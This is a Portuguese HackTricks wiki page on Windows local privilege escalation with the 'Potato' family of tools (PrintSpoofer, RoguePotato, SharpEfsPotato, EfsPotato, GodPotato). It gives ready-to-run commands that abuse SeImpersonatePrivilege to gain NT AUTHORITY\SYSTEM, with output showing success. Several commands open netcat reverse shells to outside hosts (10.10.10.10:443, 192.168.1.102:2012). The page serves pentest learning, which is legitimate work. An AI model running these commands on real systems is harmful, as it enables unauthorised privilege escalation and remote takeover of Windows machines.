# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato {% hint style="success" %} Aprenda e pratique Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Aprenda e pratique Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)! * **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
{% endhint %} {% hint style="warning" %} **JuicyPotato não funciona** no Windows Server 2019 e Windows 10 build 1809 em diante. No entanto, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** podem ser usados para **aproveitar os mesmos privilégios e obter acesso ao nível `NT AUTHORITY\SYSTEM`**. Este [post de blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) aprofunda-se na ferramenta `PrintSpoofer`, que pode ser usada para abusar de privilégios de impersonação em hosts Windows 10 e Server 2019 onde JuicyPotato não funciona mais. {% endhint %} ## Demonstração Rápida ### PrintSpoofer ```bash c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -------------------------------------------------------------------------------- [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] CreateProcessAsUser() OK NULL ``` ### RoguePotato {% code overflow="wrap" %} ```bash c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999 # In some old versions you need to use the "-f" param c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999 ``` {% endcode %} ### SharpEfsPotato ```bash > SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log" SharpEfsPotato by @bugch3ck Local privilege escalation from SeImpersonatePrivilege using EfsRpc. Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0. [+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2 df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc: [x]RpcBindingSetAuthInfo failed with status 0x6d3 [+] Server connected to our evil RPC pipe [+] Duplicated impersonation token ready for process creation [+] Intercepted and authenticated successfully, launching program [+] Process created, enjoy! C:\temp>type C:\temp\w.log nt authority\system ``` ### EfsPotato ```bash > EfsPotato.exe "whoami" Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability). Part of GMH's fuck Tools, Code By zcgonvh. CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net] [+] Current user: NT Service\MSSQLSERVER [+] Pipe: \pipe\lsarpc [!] binding ok (handle=aeee30) [+] Get Token: 888 [!] process with pid: 3696 created. ============================== [x] EfsRpcEncryptFileSrv failed: 1818 nt authority\system ``` ### GodPotato ```bash > GodPotato -cmd "cmd /c whoami" # You can achieve a reverse shell like this. > GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012" ``` ### DCOMPotato ![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa) ## Referências * [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) * [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer) * [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato) * [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato) * [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato) * [https://github.com/zcgonvh/EfsPotato](https://github.com/zcgonvh/EfsPotato) * [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato) {% hint style="success" %} Aprenda e pratique Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Aprenda e pratique Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)! * **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Compartilhe truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
{% endhint %}